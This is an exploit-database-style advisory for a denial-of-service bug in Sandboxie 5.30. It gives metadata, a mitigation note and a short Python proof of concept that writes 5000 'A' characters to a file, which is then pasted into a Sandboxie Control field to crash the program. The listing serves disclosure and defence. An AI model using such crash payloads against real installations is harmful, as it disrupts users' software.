Vendor: Sandboxie
By: Alejandra Sánchez
CVSS: 7.5 (HIGH)
Denial of Service
CWE: 400
Product Name: Sandboxie
Affected Version From: 5.30
Affected Version To: 5.30
Patch Exists: YES
Related CWE: N/A
CPE: a:sandboxie:sandboxie
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 10
2019

Sandboxie 5.30 – Denial of Service (PoC)

This exploit is a proof of concept for a denial of service vulnerability in Sandboxie 5.30. The script creates a file containing 5000 'A' characters; pasting that text into the 'Select or enter a program' field of the 'Configure > Programs Alerts' menu of Sandboxie Control causes the application to crash.

Mitigation:

Users should update to the latest version of Sandboxie, which is not vulnerable to this exploit.

Exploit-DB raw data:

# -*- coding: utf-8 -*-
# Exploit Title: Sandboxie 5.30 - Denial of Service (PoC)
# Date: 16/05/2019
# Author: Alejandra Sánchez
# Vendor Homepage: https://www.sandboxie.com
# Software Link: https://www.sandboxie.com/SandboxieInstall.exe
# Version: 5.30
# Tested on: Windows 10

# Proof of Concept:
# 1.- Run the Python script 'Sandboxie.py'; it will create a new file 'Sandboxie.txt'
# 2.- Copy the text from the generated Sandboxie.txt file to the clipboard
# 3.- Open Sandboxie Control
# 4.- Go to 'Configure' > 'Programs Alerts'
# 5.- Click 'Add Program', paste the clipboard into the field 'Select or enter a program' and click 'OK'
# 6.- Click 'OK' and the application crashes

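# Payload: 5000 'A' characters (0x41)
buffer = "\x41" * 5000

# Write the payload to Sandboxie.txt so it can be copied to the clipboard
with open("Sandboxie.txt", "w") as f:
    f.write(buffer)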